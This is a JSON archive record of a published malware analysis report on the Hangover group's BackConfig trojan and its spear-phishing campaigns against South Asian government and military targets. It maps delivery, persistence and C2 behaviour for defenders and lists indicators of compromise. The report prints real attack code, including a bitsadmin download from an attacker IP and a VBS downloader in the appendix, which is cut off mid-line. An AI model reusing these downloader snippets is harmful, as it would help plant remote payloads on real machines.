{
	"id": "13ec52e4-cac1-4a52-80d1-61c703396c0d",
	"created_at": "2026-04-06T00:11:18.262266Z",
	"updated_at": "2026-04-10T03:33:03.113866Z",
	"deleted_at": null,
	"sha1_hash": "d39ee9fb22106b3f9da17e504c910b97f200bbd5",
	"title": "Updated BackConfig Malware Targeting Government and Military Organizations in South Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1475079,
	"plain_text": "Updated BackConfig Malware Targeting Government and Military\r\nOrganizations in South Asia\r\nBy Alex Hinchliffe, Robert Falcone\r\nPublished: 2020-05-12 · Archived: 2026-04-02 12:26:59 UTC\r\nExecutive Summary\r\nUnit 42 has observed activity over the last 4 months involving the BackConfig malware used by the Hangover\r\nthreat group (aka Neon, Viceroy Tiger, MONSOON). Targets of the spear-phishing attacks, using local and topical\r\nlures, included government and military organizations in South Asia.\r\nThe BackConfig custom trojan has a flexible plug-in architecture for components offering various features,\r\nincluding the ability to gather system and keylog information and to upload and execute additional payloads.\r\nThe initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised\r\nlegitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for\r\nApplications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of\r\nmultiple components that result in the plug-in loader payload being downloaded and executed. 
The modular nature\r\ncertainly allows for quicker changes to individual components and, perhaps more importantly for the attackers,\r\nsplits up the malicious behaviors in such a way that could thwart sandbox and dynamic analysis systems,\r\nespecially when analyzing the components in isolation.\r\nOur threat prevention platform with WildFire detects activity associated with this threat group, while\r\nsimultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for malicious and/or\r\ncompromised domains that have been identified.\r\nIndicators of compromise related to this research are documented at the end of this report and in the Adversary\r\nPlaybook for the Hangover threat group that can be accessed in the Unit 42 Playbook Viewer.\r\nStarting Point\r\nUnit 42 first saw activity involving the Windows PE executable file (SHA256:\r\n84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c) when searching AutoFocus data\r\nrelated to particular sectors and countries of interest.\r\nThe file was first seen on January 19th, 2020, having been downloaded by two organizations -- a government\r\ndepartment in one country and a military organization in another -- within minutes of each other. The source of the\r\ndownload was http://212.114.52[.]148/request/httpsrequest and the file httpsrequest was stored locally as\r\ndphc.exe. More details on how the malware was delivered are described later in the blog.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 1 of 20\n\nThe choice of terminology in URL paths and file names when delivering BackConfig malware in this, and other\r\ncampaigns discussed later on, is clearly to blend in as benign operations, paths and filenames. 
Although spelled\r\ndifferently, it could be easy to believe the payload relates to the DHCP networking service.\r\nThe purpose of this malware is to allow the actors to download and execute an executable file, as well as\r\ndownload and run batch files to run commands on the end system.\r\nThis sample has a custom \"decryption\" routine that subtracts six from each character. The following strings are\r\ndecrypted using this method:\r\nlinkrequest[.]live\r\n\\\\Adobe\\\\Driver\\\\dwg\\\\pid.txt\r\n\\\\Adobe\\\\Driver\\\\dwg\\\\\r\n\\\\Adobe\\\\Driver\\\\dwg\\\\wuaupdt.exe\r\nThe Trojan reads the following file to use in the URL of the C2 beacon. If the file does not exist, the executable\r\nwill exit without performing any further activities. The pid.txt file is created during the earlier delivery and\r\ninstallation phases starting with the weaponized Excel document. More information about this setup process is\r\ncovered later in the delivery section. As previously mentioned, this behavior makes an automated analysis of the\r\nindividual executable payload component harder.\r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\r\nThe C2 channel uses HTTPS thanks to the INTERNET_FLAG_SECURE flag used when calling the\r\nHttpOpenRequestA function. The beacon HTTP request will look like the following:\r\nGET /orderme/[contents of pid.txt file] HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 @/NEW\r\nHost: linkrequest[.]live [resolving to 23.106.123[.]87]\r\nThe Trojan will look for the following field and values within the HTTP response header:\r\n\"Content-Type: application\"\r\n\"Content-Type: xDvsds\"\r\n\"Content-Type: Bw11eW\"\r\nIf the content-type field contains a value of application, the Trojan will extract a filename from the HTTP response\r\nheaders between the string filename and Content-Transfer-Encoding. 
It will use this filename to create a file in the\r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\ folder, which it will write the data in the HTTP response to. Based on the\r\nother two Content-Types, we believe the filename provided will be either \"wuaupdt.exe\" or test.bat.\r\nIf the content-type field has a value of xDvsds, the Trojan will attempt to execute the following file using\r\nShellExecuteA and the \"open\" method:\r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\wuaupdt.exe\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 2 of 20\n\nIf the content-type field has a value of Bw11eW, the Trojan will attempt to execute the following file using\r\nShellExecuteA and the \"open\" method:\r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\test.bat\r\nAt the time of writing, the C2 appeared inoperational and no further payloads were seen. We believe that the\r\nresultant wuaupdt.exe file would then provide further capabilities to steal information, log keystrokes, and provide\r\nthe ability to run additional commands either directly or via additional plugins which it would download, as\r\ndocumented by the Qihoo 360 Threat Intelligence group in their investigation of prior campaigns here.\r\nUnit 42 has conducted cursory binary diffing for many of the BackConfig executable files and did not find any\r\nnon-library function overlaps that would suggest that the payloads are based on the YTY or EHDev frameworks as\r\nmentioned here and here.\r\nPE Metadata\r\nThe malware sample contains some interesting static artifacts including self-signed digital certificates used to sign\r\nthe executable purporting to be software from the Foxit Software Incorporated company based in California. 
It is\r\nnot known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as\r\npreviously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy.\r\nUsing this meta-data, together with information gleaned from infrastructure investigation, Unit 42 were able to\r\npivot around on AutoFocus data to find additional BackConfig PE executable samples. Those samples from the\r\nlast 12 months are listed in Tables 1 and 2 below.\r\nSHA256 Compilation Time (UTC) First Seen (Pacific) Signer Name\r\n84e5629... 01/20/2020 7:26:09am 01/19/2020 11:49:03pm\r\nFoxit Software Incorporated\r\n18ce3ee... 10/10/2019 9:22:11am 01/16/2020 4:30:26pm\r\n4a4bc01... 11/21/2019 9:19:49am 01/16/2020 1:31:46am\r\n91c67c1... 11/21/2019 9:19:49am 12/02/2019 2:03:41am wind0ws\r\nde5b670... 11/21/2019 9:19:49am 11/21/2019 11:59:05pm\r\nf79ebf0... 10/28/2019 5:35:26am 11/09/2019 10:32:09pm NVIDIA Corporation\r\n31faeef... 10/10/2019 9:22:11am 10/13/2019 10:11:04pm Foxit Software Incorporated\r\nd87b875... 09/12/2019 5:54:04am 09/26/2019 9:32:19am Digicert Global\r\n1510996... 12/05/2018 4:35:03am 04/09/2019 10:30:16am Foxit Software Incorporated\r\nTable 1. Describing PE compile times and Digital signatures used, ordered by first seen.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 3 of 20\n\nThe Compilation Time stored in executable (SHA256: 84e5629...) appears to be after the point at which the file\r\nwas first seen by our WildFire analysis system. 
While the PE file timestamp could be modified post-compilation,\r\nthe oddity is more likely explained away with time zones -- 2349 Pacific time on the 19th is 1349 in Bangladesh\r\non the 20th, and 7:26am UTC is in the range of 11:26 to 13:26 across the South Asia region, which would make\r\nthe sample compilation quite recent with respect to the delivery of it.\r\nMore details about the self-signed digital certificates, as well as full hashes, can be found in the IOCs section at\r\nthe end of this report.\r\nThe following table shows the version information from the same PE files, grouped by similar File Description\r\nfields. The order remains the same, except for the sample (SHA256: 18ce3ee...) which was first seen January 16th,\r\n2020 but for some reason reverted to using exact version information seen in samples two to three months prior.\r\nNamely, Link Finder.\r\nSHA256\r\nFile\r\nDescription\r\nFile\r\nVersion\r\nProduct\r\nName\r\nProduct\r\nVersion\r\nCopyright\r\n84e5629...\r\nАльберт\r\n(Albert, in\r\nEnglish)\r\n06.10.2015 Альберт 01.05.2015\r\nCopyright @ 2015-2026\r\nsecosec\r\n4a4bc01... Ссылка\r\n(Link, in\r\nEnglish)\r\n01.01.12 ссылка 10.01.2015\r\nCopyright @ 2011-2021\r\nsecosec Inc. Все права\r\nзащищеныk (All rights\r\nreserved, in English)\r\n91c67c1...\r\nde5b670...\r\n18ce3ee...\r\nLink Finder 01.01.12\r\nLink\r\nFinder\r\n13,9,1632\r\nCopyright @2011-2020\r\nTechtest Inc. All Rights\r\nReserved\r\nf79ebf0...\r\n31faeef...\r\nd87b875... scrapper 01.12.001 scrapper 13,6,1662\r\nCopyright @Scrapper Ltd\r\nReserved\r\n1510996... system process 2,1,1,2015\r\nsystem\r\nprocess\r\ncleaner\r\n2,1,1,2015\r\nCopyright © 2004-2018\r\nFoxit Software Inc. All\r\nRights Reserved\r\nTable 2. Describing PE version info metadata, ordered by first seen and grouped on matching data.\r\nOf the set, the file (SHA256: 1510996...) 
has most consistency in terms of a theme, using the Foxit Copyright\r\ninformation, self-signed digital signature and even using the company logo, as shown in the Figure below, for the\r\nexecutable file’s icon. The file’s copyright information only differs from that of Foxit’s Reader software by a\r\nmissing period symbol, implying it was copied rather than created.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 4 of 20\n\nThe actors then moved to use seemingly fictitious company and product names while using a mixture of signer\r\nnames in their digital signatures. No file icons were used at all over the last 11 months.\r\nRecent samples also included Cyrillic text in the file description, product name, and copyright fields, as shown\r\nand translated in the table above. It’s hard to know if this is an attempt to set false flags as to the origins of the\r\nBackConfig malware, or perhaps to make the content more relevant to specific targets within the victim\r\norganizations.\r\nDelivery and Installation\r\nIn this section, we describe how the various payloads are delivered based on what we have seen in our customer\r\nnetworks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence\r\nof weaponized documents used to deliver BackConfig being attached on phishing emails and that phishing URL\r\nlinks in emails appear to be the Hangover group’s modus operandi.\r\nThe remainder of this section focuses largely on Object Linking and Embedding (OLE) Microsoft Excel\r\ndocuments, as they are most commonly used by the Hangover group, at least when it comes to the BackConfig\r\nmalware. 
Through infrastructure analysis however, Unit 42 was able to find a BackConfig PE sample (SHA256:\r\ne28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f; first seen 10/24/2019) using the C2\r\ndomain matissues[.]com and dropped by the weaponised Rich Text Format (RTF) file (SHA256:\r\n752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f) from the same day. The RTF used the\r\nCVE-2017-11882 exploit against equation editor vulnerabilities in Office applications to execute the PE sample\r\nwhich was a unique exploitation method compared to all other samples analyzed.\r\nCompromised Third-Party Infrastructure\r\nContinuing to pivot on data obtained from the samples found thus far, we discovered some related URLs relating\r\nto compromised third-party infrastructure supporting the delivery of the BackConfig malware. The following table\r\nlists some examples of compromised sites delivering weaponised XLS files with filenames, such as\r\nCircular_No_03.xls (SHA256: 0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf) and\r\nCircullar_Nov_2017.xls (SHA256: ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb)\r\nimplying (even with incorrect spelling) that the contents is, or relates to, a letter or advertisement which is\r\ndistributed to a large number of people.\r\nSHA-256\r\nFirst\r\nSeen\r\nRelated URL Description Location\r\nbe3f12b...\r\n2019-\r\n10\r\nhttp://nsaimmigration[.]com/userfiles/image/\r\nfbr.php and nphp_registration_form.php (both\r\nHTTP 404)\r\nConsultant and\r\nLegal Advice\r\ncompany\r\nsupporting students\r\nto live and study\r\nabroad.\r\nPakistan\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 5 of 20\n\n0aa5cf1...\r\n2018-\r\n09\r\nhttp://webtechhub[.]com/wordpress/wp-content/images/fbr_circular.php\r\nWeb design and\r\ndev site 
running\r\noutdated\r\nWordPress\r\napplication\r\nPakistan\r\ned638b5...\r\n2017-\r\n11\r\nhttp://alphamike.com[.]mv/housing\r\nShipping agency\r\nfor freight\r\nforwarding and\r\ncargo delivery.\r\nMaldives\r\nhttp://mgamphs.edu[.]bd/info/ (down)\r\nMuhurigonj\r\nAcademy of Music\r\nand Performance\r\nHigh School.\r\nReference.\r\nBangladesh\r\nTable 3. Compromised third-party infrastructure to support delivery of BackConfig.\r\nGiven the targeting related to these threats, and the compromised third-party websites, we believe the use of “fbr”\r\nin some of the URLs above likely relates to the Federal Board of Revenue (FBR) government organization of\r\nPakistan. The “fbr” theme also runs into the VBA macro code. File ed638b5... contains the statement Const\r\nWelcomePage = \"FBR\".\r\nThe old compromised hosting examples in Table 3 above do not rely on Hypertext Preprocessor (PHP) server-side\r\nscripts to deliver the weaponized XLS files. Instead, the pages simply used HTTP response status 301 (Moved\r\nPermanently) for URL redirection to said XLS, initiating the download. More recent examples make use of PHP\r\nwith URL filenames matching the social engineering theme, such as “fbr”. In addition, the actors use the PHP\r\nscript to log any visitors to the page noting in a file named “info.txt” the datetime stamp of the event, the client\r\noperating system, and their IP address.\r\nThe location of the compromised third-party infrastructure or the organizations legitimately using them, align with\r\nthe targeting Unit 42 has seen. This could be pure coincidence, a sign from the threat actors that their intention is\r\nto take advantage of weaknesses in the target country’s wider infrastructure, or the threat actors leveraging in-country infrastructure that may be considered more trustworthy by the intended victims and their security\r\nsolutions.\r\nPalo Alto Networks’ WildFire sandbox analyzed sample ed638b5... 
on November 8th, 2017, and, as described in\r\nthe table above, the sample was hosted on two compromised websites: a Bangladesh school and a Maldivian\r\nshipping agency. While Unit 42 has not seen Hangover activity in the Maldives, the archipelago is in the region\r\nalongside other known targets and, interestingly, swore in a new President about a week after Unit 42 analyzed the\r\nsample.\r\nThe EXE payload (SHA256: 4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd)\r\ndownloaded directly by the VBA code in sample ed638b5... from the URL below relates to those documented by\r\nBitDefender here. To date, Unit 42 has only seen 6 similar samples since the late-2017 timeframe for this sample,\r\ncompared to many more prior, perhaps indicating a changeover of the custom payloads used by the Hangover\r\ngroup. Certainly, there are some overlapping Tactics, Techniques and Procedures (TTPs) between the older samples\r\nand the more recent BackConfig samples.\r\nhttp://chancetowin.quezknal[.]net/appstore/updatepatch/logs.exe\r\nEvolution of Delivery Payloads\r\nBefore moving on to describe the most recent samples and installation methods used by the Hangover actors, the\r\ntimeline figure below provides a high-level view of the evolution in TTPs used.\r\nFigure 2. Evolution of delivery payloads\r\nDespite the evolution over the years, some habits are hard to break. Firstly, every weaponized XLS Unit 42 has\r\ninvestigated loads a fake error message, such as the one shown in Figure 3 below, to trick the victim into thinking\r\nthat the file is corrupt and thus nothing has -- or will -- load as intended. Another fictitious error message text has\r\nbeen used in the past, often with poor spelling or grammar.\r\nFigure 3. 
Example fake error message displayed to the victim.\r\nSimilarly, the version information metadata stored in all the Excel documents analyzed shares the same Author and\r\nLast Modified By names - Testing.\r\nThe following subsections describe the campaigns and malware as highlighted by the three most recent milestones\r\nin the timeline figure above.\r\n2019 Milestone: Multi-Component\r\nRegistration Form.xls (SHA256: be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461)\r\nlisted in Table 3 above provides an example of the types of lures used by the threat actors.\r\nUpon opening the XLS and enabling the macro code, the picture in Figure 4 below is shown on top of white-background cells. As the filename suggests, it’s a registration form and relates to the Naya Pakistan Housing\r\nprogram run by the Pakistani government to help solve the housing shortfall in the country. Eligible citizens\r\ninclude government employees, and registration forms were due by October 15th, 2019 (extended through\r\nNovember 15th), meaning the timing and the lure of the campaign on October 25th were clearly planned to\r\nincrease the chances of compromise.\r\nFigure 4. Social engineering lure against Pakistan government in October 2019\r\nAs the PHP webpages did not exist at the time of writing, Unit 42 cannot prove the XLS file be3f12b... was hosted\r\nat the URL listed in row 1 of Table 3 above. However, because of the following points, we have high confidence\r\nin the campaign relationship between the two.\r\n1. AutoFocus and VirusTotal first processed the XLS file be3f12b... on October 25th, 2019\r\n2. VirusTotal processed the nsaimmigration... URL on the same day\r\n3. 
A specific HTTP GET request URL using the notation nphp_registration_form.php?r= was\r\nprocessed in VirusTotal on the same day, and has relations to\r\nhttp://185.203.119[.]184/fin_div/session, which matches the IP address and URL structure in the\r\nVBS code dropped by the XLS be3f12b....\r\n4. The name of the PHP webpage nphp_registration_form.php relates to the filename of the XLS.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 9 of 20\n\nThe VBA macro code in the XLS file be3f12b... differed somewhat from that of the samples of the previous years.\r\nInstead of directly storing encoded EXE files or running batch shell commands directly from the VBA code itself,\r\nit retrieved the content from hidden columns in the Excel sheet, starting at column 27 or “AA”, which is likely to\r\nbe off-screen for most people. Once the font colour was changed, the “setup” batch code component as per\r\nprevious variants, and the new Visual Basic Script (VBS) downloader component were revealed in columns AA\r\nand AB, respectively, as shown in figure 5 below.\r\nFigure 5. VBS downloader and BAT setup file revealed in the XLS sheet.\r\nMacro VBA code in the XLS parses the content of the two columns line by line writing the contents to their\r\nrespective files on disk and executing them following the same process flow as described below in Figure 6.\r\n2019 Milestone: BITS and ZIPs\r\nA more recent weaponized XLS file (SHA256:\r\n021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b) was analyzed by WildFire on\r\nNovember 15th, 2019 and exposed some new techniques. On this occasion, the VBA macro code contained a\r\ndecimal-encoded ZIP file of only 1,062 bytes in size. Inside the ZIP archive were two text files that would be\r\ndecompressed to a folder driverkit. One file, driverkit.bat, is the “setup” BAT file already discussed in this report\r\nand listed in the appendix section. 
The other file, Winmgt.txt, is an adaptation of the VBS downloader also\r\ndescribed in this report. However, instead of a direct HTTP download using an MSXML DOM object, this version\r\nwrites the following contents to Winmgt_Drive.bat, which is executed by a third scheduled task created by the\r\n“setup” BAT file.\r\necho off\r\nbitsadmin /transfer Microsoft_Update /download /priority high http://185.203.119[.]184/winmgt/winmgt.exe %USERPROFILE%\\Adobe\\Driver\\pdf\\winmgt.exe\r\ndel %0\r\n2020 Milestone: Fine Tuning\r\nThe following execution flow diagram is based on one of the most recent weaponized documents Unit 42 has seen,\r\nInvoice.xls (SHA256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c; first seen\r\n2020-01-15).\r\nThe infection process consists of multiple components as just described. The “setup” batch (BAT) file coordinates\r\nmuch of the infection process of the BackConfig plug-in loader once the VBA has written it to disk and executed\r\nit.\r\nFigure 6. Execution flow of BackConfig malware\r\nThe numbered list below describes Figure 6.\r\n1. Text file Drive.txt (SHA-256:\r\n4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and\r\ncontains the decimal-decoded VBS content.\r\n2. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both\r\nfiles is shown in the appendix section of this report.\r\n3. Audio.txt is renamed to Audio.bat and executed.\r\n4. 
Audio.bat cleans up any files and folders related to previous infections, and recreates the required\r\nenvironment including creating the aforementioned pid.txt file, and setting various folders and files\r\nto be hidden from a default Windows Explorer view. The contents of pid.txt is the victim’s computer\r\nname concatenated with a hyphen followed by a random number, although I believe the code used\r\nwould not work as intended.\r\n5. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist:\r\ndphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals.\r\n6. Finally, before deleting itself, Audio.bat will rename Drive.txt to Drive.vbs. When Drive.vbs is\r\neventually executed by the task scheduler, it will download the BackConfig executable payload. In\r\nthe case of file 8892279f3... the remote location is http://185.203.119[.]184/Dropbox/request.\r\n7. When dphc.exe is eventually executed by the task scheduler, it first checks for the presence of\r\npid.txt (step 4.) and only continues if the file exists.\r\nUltimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system\r\nsettings and creates two scheduled tasks. However, this behaviour may not be enough to determine the\r\ncomponents as malicious. 
Only after 20 minutes will the task scheduler execute the VBS downloader component\r\nand launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring.\r\nATT\u0026CK\r\nThe following table describes the TTPs associated with the multiple campaigns described in this report.\r\nTactic Technique (Mitre ATT\u0026CK ID)\r\nTechnical Information Gathering\r\nAcquire OSINT data sets and information (T1247)\r\nConduct social engineering (T1249)\r\nAdversary Opsec Compromise 3rd party infrastructure to support delivery (T1312)\r\nBuild Capabilities\r\nCreate custom payloads (T1345)\r\nObtain/re-use payloads (T1346)\r\nStage Capabilities Upload, install, and configure software/tools (T1362)\r\nInitial Compromise Spear Phishing Link (T1192)\r\nExecution\r\nUser Execution (T1204)\r\nExploitation for Client Execution (T1203)\r\nExecution, Persistence Scheduled Task (T1053)\r\nDefense Evasion Code Signing (T1116)\r\nDeobfuscate/Decode Files or Information (T1140)\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 13 of 20\n\nHidden Files and Directories (T1158)\r\nObfuscated Files or Information (T1027)\r\nDefense Evasion, Execution Scripting (T1064)\r\nDefense Evasion, Persistence BITS Jobs (T1197)\r\nCommand \u0026 Control\r\nCommonly Used Port (T1043)\r\nStandard Application Layer Protocol (T1071)\r\nStandard Cryptographic Protocol (T1032)\r\nRemote File Copy (T1105)\r\nConclusion\r\nThe Hangover group (aka Neon, Viceroy Tiger, MONSOON) is active and targeting, according to Unit 42’s\r\nvisibility, government and military organisations in South Asia using spear-phishing emails containing letters or\r\ngovernment forms to lure victims into browsing to compromised websites serving weaponized Excel documents\r\nthat install the BackConfig Trojan. Almost exclusively, Unit 42 has seen the use of weaponized documents that\r\nrequire user execution. 
Only once in the last six months have we seen use of exploits to circumvent the need for\r\nthe user to execute any part of the installation chain.\r\nThe evolution of BackConfig’s primary and secondary payloads has seen different methods used for executing\r\ncommands and deploying executables both with and without obfuscation.\r\nThe latest versions contain modular components making it easier to update and re-use code in order to rapidly\r\ndeploy their campaigns in a timely manner to have the highest chance of success. The method in which the latest\r\nsamples execute also indicates the group’s focus on trying to evade sandbox and other automated analysis systems\r\nby breaking down malicious activity into chunks that each seem relatively benign.\r\nProtections:\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit www.cyberthreatalliance.org. 
(This is added to blogs pre-shared with the CTA, when loaded into\r\nWordPress it will be added when appropriate).\r\nIndicators of Compromise\r\nDelivery Documents\r\n56349cf3188a36429c207d425dd92d8d57553b1f43648914b44965de2bd63dd6\r\n8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 14 of 20\n\n021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b\r\nbe3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461\r\n0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf\r\ned638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb\r\n752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f (RTF using CVE-2017-11882)\r\nBatch Files\r\n4BAFBF6000A003EB03F31023945A101813654D26B7F3E402D1F51B7608B93BCB (Audio.txt / .bat from\r\nNaya Housing campaign)\r\nC94f7733fc9bdbcb503efd000e5aef66d494291ae40fc516bb040b0d1d8b46c9\r\n6a35d4158a5cb8e764777ba05c3d7d8a93a3865b24550bfb2eb8756c11b57be3\r\n750fc47d8aa8c9ae7955291b9736e8292f02aaaa4f8118015e6927f78297f580\r\n5292f4b4f38d41942016cf4b154b1ec65bb33dbc193a7e222270d4eea3578295\r\nf64dbcd8b75efe7f4fa0c2881f0d62982773f33dcfd77cccb4afc64021af2d9e\r\n98d27e830099c82b9807f19dcef1a25d7fce2c79a048d169a710b272e3f62f6e\r\n29c5dd19b577162fe76a623d9a6dc558cfbd6cddca64ed53e870fe4b66b44096 (driverkit.bat)\r\nabe82ffb8a8576dca8560799a082013a7830404bb235cb29482bc5038145b003 (Winmgt_Drive.bat uses bitsadmin)\r\n02c306bb120148791418136dcea8eb93f8e97fb51b6657fd9468c73fb5ea786c\r\nVBS files\r\n87e8c46d065ace580b1ed28565d1fddaa6df49da1ba83f7b3e9982cd8a0013f1 (One_drivers.txt / .vbs from Naya\r\nHousing campaign)\r\n952d4a9891a75e25e1c31a0514b97345ca0d8f240cdd4a57c8b3ff8a651a231a (Down_LinkLog.vbs)\r\na1cd89a684db41206fc71efe327ef608652931e749c24a3232908824cea426bb (Winmgt.vbs using BITS)\r\nEXE 
Payloads\r\n306fe259a250b2f0d939322cfb97787c4076c357fc9eb1f1cc10b0060f27f644\r\n0f11fb955df07afc1912312f276c7fa3794ab85cd9f03b197c8bdbefb215fe92\r\n84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c\r\n18ce3eebbb093a218a8f566b579a5784caee94fadcda8f8c0d21f214ce2bd8b9\r\n922d6e68ecac6dbfdd1985c2fae43e2fc88627df810897e3068d126169977709\r\n4a4bc01b20dd2aaa2a2434dc677a44cc85d9533bed30bc58b8026b877db028d5\r\n677d4982d714bb47fab613ebe1921005509ed0d1e8965e7241994e38c3ade9f2\r\nd3013204f1a151c72879afc213dca3cada8c3ea617156b37771bdd7b7b74057f\r\n91c67c1cda67b60c82e14a5c32d79a4236f5a82136317162dfbde1a6054cf8c1\r\nde5b670656cbdbcf11607f01a6f93644765d9647ddab39b54946170b33f7ac9a\r\nf79ebf038c7731ea3a19628cb329cada4ebb18f17439d9c6cf19d361b0494e7b\r\n9e141fe67521b75412419a8c88c199c8ebd2a135c7a8b58edced454fbc33cb77\r\n6787242a810f8a5e1423e83790064a0a98954ab0802a90649fdd55a47d75695e\r\ne28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f\r\n07c97b253452a2a8eb7753ed8c333efeaa3546c005ffcfb5b3d71dc61c49abda\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 15 of 20\n\n31faeefb4dc4e54b747387bb54a5213118970ccb2f141559f8e2b4dbfdbeb848\r\n15109962da4899949863447bfdf6a6de87a8876f92adb7577392032df44ec892\r\nD87b875b8641c538f90fe68cad4e9bdc89237dba137e934f80996e8731059861\r\n167c7d7c08d318bc40e552e6e32715a869d2d62ba0305752b9b9bece6b9e337e\r\n4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd (example of older set of\r\ndownloaders)\r\nb18697e999ed5859bfbc03e1d6e900752e1cdcd85ddb71729e2b38161366e5b5 (driverkit.zip)\r\nInfrastructure\r\nlinkrequest[.]live (23.106.123[.]87)\r\nmatissues[.]com\r\nunique.fontsupdate[.]com\r\n185.203.119[.]184\r\n212.114.52[.]148\r\nDigital Signatures\r\nThe following list of self-signed digital certificates is not exhaustive, and only relates to those seen on BackConfig\r\nPE executables samples over the past twelve months.\r\nFoxit:\r\nthumbprint: 
79635cb32cf16cf6bddfd563b09d7aa99ccb2c01\r\nissuer: CN=Foxit Software Incorporated\r\nsubject: CN=Foxit Software Incorporated\r\nversion: 3\r\nalgorithm: sha1WithRSAEncryption\r\nserial: 50:53:ce:ad:42:c2:70:84:4f:55:bc:76:a4:23:6c:c8\r\nvalid from: 1/1/2018\r\nvalid to: 1/1/2024\r\nWind0ws:\r\nthumbprint: aa9010ff841c67cf8fb88d7f1e86a778b35bcba0\r\nissuer: CN=wind0ws\r\nsubject: CN=wind0ws\r\nversion: 3\r\nalgorithm: sha1WithRSAEncryption\r\nserial: 88:de:2e:60:7f:48:2c:81:44:54:32:29:98:22:69:70\r\nvalid from: 1/1/2019\r\nvalid to: 1/1/2025\r\nNVIDIA:\r\nthumbprint: 01ba433fdc7f9b1ad1baaea6c5fd69243d03d8c3\r\nissuer: CN=NVIDIA Corporation\r\nsubject: CN=NVIDIA Corporation\r\nversion: 3\r\nalgorithm: sha1WithRSAEncryption\r\nserial: 6d:39:d4:59:15:9e:8c:b3:41:da:bd:4c:dd:37:60:e1\r\nvalid from: 1/1/2019\r\nvalid to: 1/1/2025\r\nAppendix\r\nThe following VBS and BAT code was extracted from XLS sample (SHA-256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83).\r\nVBS downloader component (SHA256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)\r\n[Drive.txt -\u003e Drive.vbs CODE]\r\nstrFileURL = \"http://185.203.119[.]184/Dropbox/request\"\r\nSet oShell = CreateObject(\"WScript.Shell\")\r\nstrHomeFolder = oShell.ExpandEnvironmentStrings(\"%USERPROFILE%\")\r\nstrPath = \"C:\\Drivers\\dphc.exe\"\r\nOn Error Resume Next\r\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\r\nobjXMLHTTP.open \"GET\", strFileURL, false\r\nobjXMLHTTP.send()\r\nIf objXMLHTTP.Status = 200 Then\r\nSet objADOStream = CreateObject(\"ADODB.Stream\")\r\nobjADOStream.Open\r\nobjADOStream.Type = 1\r\nobjADOStream.Write 
